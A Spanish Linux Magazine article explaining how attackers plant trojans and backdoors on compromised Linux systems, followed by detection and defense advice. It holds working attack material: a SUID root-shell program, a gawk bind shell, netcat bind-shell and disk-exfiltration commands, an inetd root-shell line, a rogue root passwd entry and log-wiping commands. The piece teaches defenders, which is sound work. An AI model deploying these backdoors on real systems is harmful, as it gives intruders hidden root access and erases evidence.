PORTADA • Pasadizo Secreto
Técnicas para la creación de un troyano oculto
PASADIZOS
SECRETOS
Las puertas traseras proporcionan al atacante acceso ilimitado a un sis-
tema zombie. Si quieres evitar que los chicos malos se acomoden, te
interesará un análisis sobre las herramientas que se pueden usar para
crear un troyano. POR AMIR ALSBIH
D
espués de lanzar con éxito un ata-
que, un hacker malintencionado
no se sienta a descansar. Explotar
una vulnerabilidad y conseguir acceso con
privilegios de root es sólo la mitad de la
historia. Como norma general, los atacan-
tes están más interesados en continuar
explotando la máquina lanzando nuevos
ataques desde ella. Para facilitar las cosas,
tras el acceso inicial, normalmente un ata-
cante tratará de manipular la máquina víc-
tima. El proceso del ataque comprende
cinco fases distintas:
1. El atacante explota un agujero de seguri-
dad local o remoto para hacerse con el
control de la computadora de la víctima.
2. Escala privilegios hasta conseguir el sta-
tus de administrador. El nivel de admi-
nistrador es necesario para que el ata-
cante pueda borrar archivos de registro o
instalar rootkits.
3. El atacante elimina cualquier rastro lim-
12 Número 29
piando el historial y manipulando archi-
vos de registro, o wtmp y utmp.
4. El intruso instala rootkits que ayuden a
mantener oculto el ataque. Gracias al
rootkit los administradores de la
máquina comprometida no pueden ver
los procesos, conexiones y archivos del
atacante.
5. El último paso es preparar una puerta
trasera para facilitar el acceso. Los troya-
nos hacen que la máquina quede en
manos del atacante, incluso en caso de
que el agujero que le permitió entrar sea
parcheado.
La primera parte del ataque ya ha sido
objeto de estudio, pero a menudo es difícil
hallar información sobre la parte final y
crucial del troyano. ¿Qué significa que un
atacante “instala una puerta trasera”? Este
artículo explica las técnicas que usan los
atacantes a la hora de crear una puerta tra-
sera en un sistema comprometido.
WWW.LINUX- MAGAZINE.ES
La Puerta Trasera
Tras limpiar los archivos de registro e
implementar las ofuscadoras utilidades del
rootki,t el atacante ya puede pasar a la
parte final: la instalación del troyano. La
forma más simple de asegurarse el acceso
es el mismo agujero de seguridad que se
usó en un primer momento para entrar a la
máquina. Si ésta es actualizada solamente
de forma esporádica, como es el caso de
muchos de los PCs domésticos o escolares,
puede resultar un método extremadamente
efectivo, ya que el rastro que deja es
mínimo.
Esta forma de operar tiene una desven-
taja muy importante, y es que se corre el
peligro de perder el acceso a la máquina en
caso de que la víctima instale una actuali-
zación. Otro inconveniente es que normal-
mente el agujero no dará al atacante acceso
a una terminal. Muchos intrusos profesio-
nales preferirán cerrar el agujero usado

Limpieza de registros
Lo primero que hace un hacker experi-
mentado es eliminar rastros. La mejor
forma de llevarlo a cabo es con grep.
La opción -v suprime las líneas coinci-
dentes con una expresión regular
determinada. Por ejemplo, si necesita-
mos eliminar de un archivo de registro
todas las líneas que contienen la direc-
ción IP 192.168.100.12:
cat logfile | grep -v U
“192.168.100.12” U
>> logfile.mod
mv logfile.mod logfile
Claro que este método no es seguro.
Es bastante más fácil restaurar los
archivos usando alguna herramienta
forense. Por desgracia, este sistema
tan simple consigue engañar a muchos
administradores. Un hacker más minu-
cioso ejecutaría wipe sobre el archivo
original para eliminar el archivo en
lugar de sobreescribirlo. También nos
puede servir alguna herramienta para
la limpieza de archivos de registro,
como la que encontramos en
Darklab.org [1].
para su entrada inicial a fin de evitar que
un script kiddie use la misma puerta para
entrar y levante sospechas.
A fin de garantizar un método de acceso
más fiable, muchos hackers instalan troya-
nos especiales. Se distinguen principal-
mente dos categorías de troyanos:
• Troyanos locales: Si un usuario ya tiene
una cuenta en el sistema, no necesitará
abrir ningún puerto. Bastará con que
ingrese en el sistema y se concentre en
la escalada de privilegios.
• Troyanos remotos: Si el hacker no tiene
una cuenta legítima en la máquina, el
troyano deberá proporcionarle acceso a
modo de shell remota. El hacker va a
necesitar esta shell remota para no tener
que andar ejecutando a cada visita un
exploit para el kernel u otro tipo de
escalada de privilegios.
La protección de los sistemas y los
mecanismos de seguridad han existido a
lo largo de los años, y los sistemas de pre-
vención y detección de intrusiones son
hoy herramientas estándar.
Paralelamente, los troyanos se han
vuelto más sofisticados. Muchas de las
técnicas que los troyanos han heredado
parecen novedosas, si bien con capacidad
retrospectiva; aunque conviene recordar
que la seguridad informática, hasta hace
tan sólo unos pocos años, no se tomaba
tan en serio como hoy día. Bajo estas cir-
cunstancias, las técnicas más simples
solían ser las más efectivas, especialmente
cuando los atacantes podían contar con
una actitud descuidada en materia de
seguridad por parte de los administrado-
res.
Troyanos Locales
Un troyano local requiere que el atacante
tenga acceso legítimo al sistema. Ha
habido pocos cambios en las técnicas tradi-
cionales a lo largo de los años. Un troyano
local podría consistir en un programa en C
o en un script que brinde al atacante el
control de una shell con privilegios de root.
Para esto, el script o el programa activa la
marca SUID. Normalmente el programa
tiene un aspecto como éste:
int main() {
setuid(0);
setgid(0);
execl(“/bin/sh”,”ps”,”-i”,U
NULL);
return 0;
} fichero, donde los administradores no sue-
El comando setuid(0) especifica que el ID
del usuario será 0 (root), mientras que set-
gid(0) cambia el del grupo para que coin-
cida. El programa abre entonces una shell
que se muestra como ps en la lista de pro-
cesos. Normalmente los atacantes escon-
den estos scripts en lo más recóndito del
árbol de directorios para ejecutarlos cada
vez que quieran lanzar una shell como
root.
Troyano con Awk
01 #!/usr/bin/gawk -f
02 BEGIN {
03 Port = 8080 # Puerto en el que
escuchar
04 Prompt = “bkd> “ # El prompt
05 # Abrir puerto de escucha
06 Service = “/inet/tcp/” Port
“/0/0”
07
08 while (1) {
09 do {
10 # Mostrar prompt
11 printf Prompt |& Service
WWW.LINUX- MAGAZINE.ES
Pasadizo Secreto • PORTADA
Otros troyanos locales toman la forma de
binarios modificados. Debido a que el
código abierto es fácilmente accesible, no
es muy difícil para los hackers modificar
programas libres y usarlos para reemplazar
a los programas originales. De nuevo, esto
sólo sirve si el programa se ejecuta con pri-
vilegios de root.
El troyano eject es un ejemplo de un tro-
yano binario. Tecleando eject -t abrimos y
cerramos la bandeja del dispositivo de CD.
Una versión modificada de eject compro-
bará si está definida una variable determi-
nada y si el contenido de dicha variable
coincide con una contraseña proporcio-
nada con eject. En tal caso, la herramienta
eject manipulada brindará una shell con
privilegios de root al usuario que ejecuta el
binario. Como el parámetro -t cierra la ban-
deja, un usuario que se encuentre en las
proximidades de la máquina víctima no se
percatará del ataque.
Camuflaje de Contraseñas
La puerta trasera más simple supone aña-
dir un usuario con privilegios de root a
/etc/passwd y/o /etc/shadow. El mejor sitio
para añadir una línea es a mitad del
len leer con detenimiento. Tras introducir
dicha línea, el fichero passwd podría tener
este aspecto:
...
hacker_malig:x:0:0:cuenta del U
hacker maligno:/root:/bin/bash
...
Al añadir una cuenta de usuario, el ata-
cante ya no depende de un servicio deter-
12 # Leer comando
13 Service |& getline cmd
14 if (cmd) {
15 while ((cmd |& getline) > 0
16 # Ejecutar comando,
17 # devolver respuesta
18 print $0 |& Service
19 close(cmd)
20 }
21 } while (cmd != “exit”)
22 close(Service)
23 }
Número 29 13
PORTADA • Pasadizo Secreto
Figura 1: PHPremoteshell proporciona un acceso oculto a los atacantes con cualquier navega-
dor. El atacante sólo tiene que esconder un archivo en el directorio adecuado.
minado; por contra, puede ingresar al sis-
tema tanto local como remotamente.
Usando servicios como SSH, el atacante
se asegura de que la sesión sea imposible
de analizar, incluso con herramientas
como tcpdump, ya que se usa una cone-
xión cifrada. Por supuesto, el atacante ten-
drá que limpiar wtmp y utmp, así como los
archivos de registro a fin de eliminar ras-
tros.
Netcat
La utilidad Netcat es también un puerta
trasera muy popular. Por ejemplo, Netcat
tiene la capacidad de clonar discos duros.
Para hacerlo, el atacante ejecuta el
comando dd if=/dev/hda | netcat IP-DES-
TINO puerto en el sistema del disco a clo-
nar, y netcat -l -p puerto > /dev/sda en el
sistema de destino para crear una copia
idéntica del disco duro, incluida cualquier
información confidencial contenida en él.
De todas formas, el uso más habitual de
Netcat es redirigir su entrada a una shell. Si
se establece la comunicación con un sis-
tema destino, la entrada pasa directamente
a la shell. El atacante sólo necesita insertar
netcat -l -p 1234 -e /bin/bash en la máquina
de destino y netcat IP-DESTINO 1234 en la
máquina atacada.
Un Mal Uso de Awk
Pocos usuarios son conscientes del poten-
cial destructivo de esta herramienta clásica
de Unix: Awk. Grugq mostró el uso de Awk
como puerta trasera en la Blackhat Confe-
rence de 2005 [1]. El ataque ata a Awk en
14 Número 29
un puerto determinado (Listado 1). Enton-
ces el atacante puede teclear netcat direc-
ción_de_destino 8080 para conectar con el
sistema y que le sea devuelta una shell
simple.
Troyano con inetd
El superservidor inetd también permite a
los atacantes implementar troyanos sim-
ples. La forma de hacerlo es bastante senci-
lla: el atacante define un nuevo servicio
añadiendo una línea al fichero /etc/
inetd.conf. Se podría usar el puerto 79,
puerto en el que suele escuchar el demonio
finger. La entrada para instalar un servicio
de puerta trasera con una shell interactiva
con privilegios de root queda como ésta:
finger stream tcp nowait root /bin/sh sh -i.
Como el puerto 79 pertenece a un servi-
cio estándar, el atacante puede usar sim-
plemente la palabra clave finger. Entonces
inetd comprobará si la palabra coincide
con algún puerto definido en /etc/services,
en cuyo caso comenzará la escucha en
dicho puerto. De este modo el hacker
puede ejecutar netcat hacia el puerto finger
de la máquina víctima para obtener una
shell con privilegios de root. Si decidiera
usar un puerto desconocido, sin entrada en
/etc/services, tendría que añadir a dicho
fichero la entrada para su servicio en lugar
de la de finger.
Troyano PAM
Los módulos PAM (Pluggable Authentica-
tion Modules) proveen interfaces de pro-
gramación para sistemas de autenticación.
WWW.LINUX- MAGAZINE.ES
Hoy día la mayoría de aplicaciones usan
esta librería, lo que convierte a estos
módulos en un lugar idóneo donde camu-
flar un troyano, particularmente intere-
sante para los atacantes.
Una forma de componer PAM es mani-
pulando el fichero support.c del código
fuente de PAM, de forma que incluye una
contraseña por defecto, oculta en el código.
Seguidamente el módulo, antes de proce-
der a autenticarle, comprueba que la con-
traseña que el usuario ha proporcionado
coincide con la contraseña secreta incluida
en el módulo. Si no coincide, se usa el sis-
tema de autenticación habitual. Esto signi-
fica que cada usuario del sistema (incluido
root) tiene dos contraseñas: una almace-
nada en /etc/shadow y una llave almace-
nada en la librería PAM manipulada.
Loki 2
Loki 2 [2] fue publicada en Phrack Maga-
zine como prueba de concepto de troyano-
túnel. La herramienta esconde comandos
de terminal camuflándolos dentro de las
peticiones DNS, respuestas DNS, peticio-
nes ICMP echo y respuestas ICMP echo.
Una herramienta de monitorización de
redes como tcpdump no detectaría tráfico
sospechoso a priori, ya que el ataque no
necesita abrir nuevos puertos. De todos
modos, este tráfico ICMP y/o DNS inusual
puede ser indicativo de alguna anomalía.
Loki está basado en una arquitectura
cliente/servidor, y soporta cifrado
mediante el uso de algoritmos como Blow-
fish o Xor. Esto hace que la reconstrucción
de la sesión sea bastante compleja. En la
práctica, en las aplicaciones es más lógico
usar las respuestas ICMP echo que las peti-
ciones, ya que muchos cortafuegos blo-
quean las peticiones entrantes, mientras
que permiten pasar las respuestas salientes
– después de todo no tiene mucho sentido
bloquear las respuestas que se dan a un
ping.
Troyanos Web
Los atacantes han desarrollado una serie
de troyanos web a fin de trabajar con corta-
fuegos cuidadosamente configurados. El
motivo principal es que un servidor web
siempre necesita permitir el acceso web, es
decir, siempre habrá un puerto abierto que
un atacante podría explotar.
Esto llevó al desarrollo de los troyanos
CGI y PHP. Los dos métodos se basan en
los mismos principios, y ambos brindan al
atacante un acceso basado en el navega-

dor. Una gran ventaja de los troyanos web
es que el acceso al servidor puede ser con-
ducido a través de los servicios que ofrecen
proveedores de anonimato como Tor o JAP.
PHPremoteshell [3] es un ejemplo de este
tipo de troyanos. El atacante sólo tiene que
ocultar el archivo PHP en las profundida-
des del sistema de ficheros del servidor y
asignarle los permisos pertinentes. Eso es
Nombre
Kaiten
Netcat
PHPRemoteshell
Reverse WWW Tunnel Backdoor
Bindtty
Silentdoor
Safebreaker
Loki
Archivos SUID
Troyano PAM
/etc/passwd, /etc/shadow y /etc/initd.conf
Pasadizo Secreto • PORTADA
todo lo necesario para tener fácil acceso aceptan comandos incrustados en el
con cualquier navegador (Figura 1). código HTML. La ventaja es que la cone-
La shell oculta proporciona información xión se inicia desde dentro del perímetro
del sistema y ejecuta comandos arbitrarios de la red, lo que en muchos casos ayuda al
en la máquina víctima. Al mismo tiempo atacante a burlar el cortafuegos. El hecho
incluye un navegador que soporta la de que los comandos estén ocultos en el
subida y descarga de archivos (Figura 2). código HTML es otra gran ventaja, ya que
Algunos troyanos web establecen una hace que este código malicioso sea difícil
conexión con un servidor web maestro y de descubrir por los forenses. El “Reverse
Tabla 1: Herramientas troyano
Descripción Fuente
Un troyano IRC. Se conecta al puerto 6667 http://packetstorm.linuxsecurity.com/irc/kaiten.c
de un servidor IRCy espera órdenes en un canal.
Entre otras cosas, soporta ataques por
saturación y puede ejecutar código arbitrario.
Los script kiddies suelen usar netcat como http://netcat.sourceforge.net
troyano dada su capacidad para redirigir la
entrada/salida.
PHPRemoteshell es un troyano web; un http://phpremoteshell.labs.libre-entreprise.org
atacante sólo debe dejarlo en un directorio
capaz de ejecutar código PHP.
La shell remota proporcions al atacante
acceso a shell y navegación de directorios,
así como subida y descarga de archivos.
Un troyano para evadir cortafuegos. El troyano http://packetstormsecurity.org/groups/thc/
se conecta a un servidor web maestro y acepta rwwwshell-2.0.pl.gz
comandos incrustados en el código de páginas
web.
Un troyano con soporte para terminal. Bindtty http://www.2701.org/archive/200311240000.html
quedará a la escucha tras el puerto 4000 por
defecto.
Silentdoor es un troyano de última generación. http://cmn.listprojects.darklab.org/
No escucha tras un puerto específico, sino que SAdoor-20031217.tgz
usa libpcap para capturar el trafico de la red.
Cuando detecta un paquete especialmente
manipulado puede, por ejemplo, devolver
una shell.
Un troyano de nueva generación que usa los http://www.informatik.uni-freiburg.de/~alsbiha/
RAW sockets de C para capturar el tráfico de la code.htm
red y devuelve una terminal o realiza una
conexión inversa cuando detecta un paquete
especialmente manipulado. Usa gnutls para
cifrar el tráfico y ofuscar el contenido de la
sesión.
Un troyano que usa los paquetes ICMP para http://packetstorm.linuxsecurity.com
transportar las órdenes. Los paquetes se
pueden cifrar con los cifrados Blowfish o XOR.
Se pueden reemplazar archivos suid por
binarios troyanizados. El atacante puede
obtener privilegios de root pasando un
parámetro o definiendo una variable de entorno.
Ya que los módulos PAM son la interfaz de
autenticación estándar en Linux, se puede
hardcodear una contraseña en support.c
para acreditarse en cualquier servicio que
use el software PAM manipulado.
Normalmente los atacantes añaden servicios
o usuarios con privilegios de root a estos ficheros
para poder acreditarse.
WWW.LINUX- MAGAZINE.ES Número 29 15
PORTADA • Pasadizo Secreto
Figura 2: Los troyanos web como PHPremoteshell ofrecen cómodas utilidades de subida y
descarga de cualquier tipo de archivo.
WWW Tunnel” (Túnel inverso para www)
[4] es un ejemplo de este tipo de troyano.
Bindshell
Todos los tipos de troyanos que hemos
visto hasta ahora tienen un inconveniente
importante: no proporcionan soporte para
terminal. Están orientados a ser utilizados
mediante el uso de líneas, lo que explica
porqué con ellos no se pueden ejecutar
programas como vi, que usan caracteres.
Un troyano sin este inconveniente, y con
soporte para terminal, es bindtty, por sd
[5]. Una herramienta basada en cliente/
servidor, donde el componente servidor
abre un puerto definido en el código, por
defecto el 4000. Siempre que un cliente se
conecte a este puerto obtendrá una shell
con soporte de pseudoterminal.
Esto da al atacante acceso ilimitado al
sistema remoto. Una enorme ventaja en
comparación con tipos más antiguos de
puertas traseras. Al mismo tiempo, el tro-
yano permite que se conecten varios clien-
tes simultáneamente, una habilidad que
los troyanos basados en netcat o gawk no
poseen.
Troyanos Sniffer
Hay una técnica relativamente reciente que
hace uso del rastreo de paquetes (sniffing).
Estos troyanos capturan todo el tráfico de
una interfaz de red respondiendo a un tipo
determinado de paquetes. Silentdoor [6] es
16 Número 29
una implementación de troyano sniffer que
usa la función de captura de la librería libp-
cap. Silentdoor, para asegurarse de que
sólo reacciona a los paquetes dirigidos al
puerto UDP 53, actúa del siguiente modo:
1. Busca en el payload una clave para el
troyano.
2. Desencripta el contenido del paquete
(XOR).
3. Comprueba que el paquete realmente
contiene una orden para Silentdoor.
4. Ejecuta el comando.
Una vez más, este tipo de troyano no
proporciona soporte para terminal. El
punto fuerte de Silentdoor es que se
enconde bien y sólo abre un puerto
durante la conexión.
Es posible encontrar este tipo de troya-
nos buscando conexiones SSL, paquetes
con aspecto de payload cifrado o conexio-
nes en puertos desconocidos.
Safebreaker
Safebreaker es un troyano sniffer de nueva
generación. Lo que motivó su desarrollo
fue la implementación de un troyano que
no dependiese de la librería libpcap de
tcpdump [7], la cual aún tiene asuntos de
estabilidad por resolver y además no suele
estar instalada en la mayoría de sistemas.
Al mismo tiempo, el desarrollador quería
que Safebreaker usase una combinación de
técnicas contemporáneas para demostrar
así los peligros potenciales de las nuevas
WWW.LINUX- MAGAZINE.ES
generaciones de troyanos. Otro objetivo
importante era la sustitución del frágil
cifrado XOR por otro sistema de encripta-
ción más robusto. Para dicha tarea, los des-
arrolladores tuvieron en cuenta tres libre-
rías:
OpenSSL [9], GnuTLS [10] y Cryptlib
[11], eligiendo finalmente GnuTLS, dada la
excelente documentación y la facilidad de
integración con el software actual.
Para modificar las funciones de recep-
ción y transmisión de paquetes, y además
dotar al troyano de cifrado en la conexión,
sólo hay que cambiar unas pocas líneas de
código. Básicamente, Safebreaker actúa del
siguiente modo:
1. Comprueba cada paquete para determi-
nar si es un paquete TCP o no. Si no lo
es, no puede contener órdenes, y pasa
por tanto al siguiente paquete.
2. Con cada paquete TCP compara el
puerto de destino con un valor predefi-
nido. Sólo los dirigidos a un puerto espe-
cífico son los destinados al troyano, el
resto se desecha.
3. No importa que no haya un servicio tras
el puerto de destino. El troyano no blo-
quea ni abre ningún puerto. La compro-
bación del puerto de destino sólo sirve
para precisar el número de paquetes diri-
gidos al troyano. Tampoco tiene efecto
sobre un posible servicio tras el puerto
de destino.
4. El siguiente paso es comprobar que las
marcas SYN y ACK son las esperadas.
5. Si es así, lo siguiente es comprobar si el
ID del paquete concuerda con el ID
mágico del troyano.
6. Para acabar, ya podemos estar bastante
seguros de que el paquete contiene órde-
nes para el troyano. Se evalúa por tanto
el número de secuencia del paquete.
Ciertos números representan comandos
específicos. Safebreaker puede desempe-
ñar dos tareas distintas: bien construir
un pseudoterminal en el puerto especifi-
cado por el paquete, dando el control a
quien lo envía; o bien conectar con el
cliente, usando de nuevo el puerto espe-
cificado en el paquete. Esta forma de
enfocarlo evita gran parte de los corta-
fuegos, ya que la mayoría permite cual-
quier conexión saliente originada en la
red interna.
Este tipo de instalación sólo bloquea un
puerto cuando existe la conexión entre el
atacante y el troyano, esto es, cuando el
atacante ya ha ingresado en el sistema
(netstat no mostrará una conexión en otras

circunstancias). Otra ventaja es que así el
troyano no es accesible para usuarios for-
tuitos; para acceder por la puerta trasera
hay que proporcionar los valores correctos
para el puerto, el número de secuencia y el
ID.
A la Caza de Puertas
Traseras
Siempre es bueno usar herramientas que
comprueban la integridad del sistema de
ficheros, como Tripwire [12]. Tripwire
monitoriza archivos y directorios críticos
del sistema, calculando el checksum y
comparándolo con valores anteriores. Si
encuentra un cambio, Tripwire lo notificará
al administrador, lo que le permite determi-
nar qué archivos fueron modificados, eli-
minados o añadidos durante el transcurso
del ataque.
Tripwire no nos sirve en los escenarios
donde el atacante ha eliminado el binario
tras ejecutar el troyano, ya que la herra-
mienta se encontraría en la memoria y no
en el disco. Aunque al reiniciar se elimina-
ría el troyano de la memoria, Tripwire y
herramientas similares no podrían detectar
el ataque.
También es bueno comprobar con fre-
cuencia los archivos /etc/shadow, /etc/
passwd y /etc/inetd.conf. Puedes hacerlo
simplemente con diff, comparándolos con
una copia guardada en un medio prote-
gido.
Si tu servidor SSH permite el ingreso
basado en clave, comprueba que el archivo
authorized_keys no contenga entradas
nocivas. En ese caso el atacante ni siquiera
necesitaría clave para acreditarse. De
nuevo, para archivos más grandes, diff [13]
es una buena opción.
Otra medida de protección es buscar
regularmente archivos SUID que pudieran
ser usados como troyano. La forma más
fácil de hacerlo es mediante el comando
find / -type f -perm -04000 -ls -uid 0 2 >
/dev/null.
Ya que una puerta trasera es indepen-
diente, también lo será el proceso encar-
gado de crearla, por tanto su ID y su nom-
bre aparecerán en el listado de procesos, a
menos que lo oculte un rootkit como Ove-
rride [14]. Por eso la mayoría de troyanos
se esconden detrás de nombres aparente-
mente inofensivos como ps. Es fácil modifi-
car el nombre del programa sobreescri-
biendo argv [0]. Por otro lado, este tipo de
camuflaje es bastante trivial. Sólo hay que
comprobar el tiempo de duración total del
proceso. Si descubrimos un ps que ha
estado corriendo durante más de 12 horas,
podemos suponer que se trata de un pro-
ceso malintencionado. También hay que
tener en cuenta que un troyano simple
espera conexiones entrantes en un puerto
fijo. Dicho puerto aparecería en la salida de
netstat.
De todas formas nunca se puede estar
del todo seguro, ya que los rootkits como
Override también pueden ocultar puertos.
El comando netstat -an | grep LISTEN | grep
-v LISTENING muestra el listado de puertos
abiertos. Los escáneres de puertos propor-
cionan un método mucho más fiable a la
hora de investigar puertos.
Los troyanos sniffer, la última tendencia,
son algo más complejo. netstat sólo mues-
tra la conexión cuando un cliente está
conectado, aunque realmente puede que ni
siquiera haya un puerto abierto. En otras
palabras netstat no nos sirve de ayuda en
estos casos, especialmente si se establece
una conexión saliente desde la red local
(conexión inversa), tampoco nos serviría
un escáner de puertos.
El único método efectivo en estos esce-
narios es usar herramientas de monitoriza-
ción de tráfico como tcpdump o ethereal
[15]. Debido a que un troyano sniffer usa
un procedimiento fijo para saber si un
paquete va dirigido a él o no, sólo podre-
mos detectarlo buscando patrones repetiti-
vos en el tráfico de la red.
Después de todo, es bastante improbable
que un puerto use un número de secuencia
y un ID idénticos cada vez. Podemos hallar
fácilmente anomalías en el tráfico de la red
mediante la definición de reglas que nos
permitan comprobar si se da o no el caso .
Los sistemas IPS e IDS también pueden
ayudar a la hora de encontrar troyanos
conocidos.
Defensa
No hay una solución única para todos los
tipos de puerta trasera. Si un atacante con-
sigue instalar una puerta trasera en un sis-
tema es porque dicho sistema tenía algún
agujero de seguridad. Un buen troyano
siempre necesita privilegios de root. En
cuanto un atacante consigue privilegios de
root, se puede considerar que el sistema
está “enfermo”. Para reforzar nuestra pro-
tección frente a los troyanos necesitamos
un diseño de seguridad sólido, así como
parchear el sistema regularmente. Unas
buenas reglas de cortafuegos también pue-
den contribuir a la seguridad. Dichas reglas
WWW.LINUX- MAGAZINE.ES
Pasadizo Secreto • PORTADA
deberán respetar la máxima de que se ha
de denegar todo lo que no esté permitido
de forma explícita.
Las reglas de cortafuegos que permiten
cualquier tipo de tráfico saliente generado
en la red interna son una invitación a los
hackers para el uso de métodos de cone-
xión inversa.
También es buena idea el uso de proxies
y balanceo de carga. Si además se configu-
ran los cortafuegos para que sólo permitan
la comunicación con los proxies, los hac-
kers lo tendrán más difícil a la hora de
encontrar un vector de ataque válido. Un
atacante todavía podría inyectar un tro-
yano web; aún así no tendría privilegios de
root ni soporte para terminal, algo poco
divertido para él. Hagas lo que hagas, ase-
gúrate de eliminar de tus configuraciones
todas las opciones y servicios que no vayas
a necesitar. ■
RECURSOS
[1] Limpiador de archivos de registro:
http://darklab.org/~jot/logclean-ng/
logcleaner-ng.html
[2] Loki 2: http://artofhacking.com/files/
phrack/phrack51/live/aoh_p51-06.
htm
[3] Phpremoteshell, por Emmanuel
Saracco: http://labs.libre-entreprise.
org
[4] rwwwshell Van Hauser: http://
gray-world.net/papers/rwwwshell.txt
[5] bindtty: http://www.2701.org/
archive/200311240000.html
[6] Silentdoor, por Brandon Edwards:
http://www.megasecurity.org/
trojans/s/silentdoor/Silentdoor.html
[7] TCPDump: http://www.tcpdump.org/
[8] Safebreaker, por Amir Alsbih: http://
www.informatik.uni-freiburg.de/
~alsbiha
[9] OpenSSL: http://www.openssl.org
[10] GnuTLS: http://www.gnu.org/
software/gnutls/
[11] Cryptlib, por Peter Gutmann: http://
www.cs.auckland.ac.nz/~pgut001/
cryptlib/
[12] Tripwire: http://sourceforge.net/
projects/tripwire/
[13] Diffutils: http://www.gnu.org/
software/diffutils/diffutils.html
[14] Override rootkit: http://www.
informatik.uni-freiburg.de/~alsbiha
[15] Ethereal: http://www.ethereal.com
Número 29 17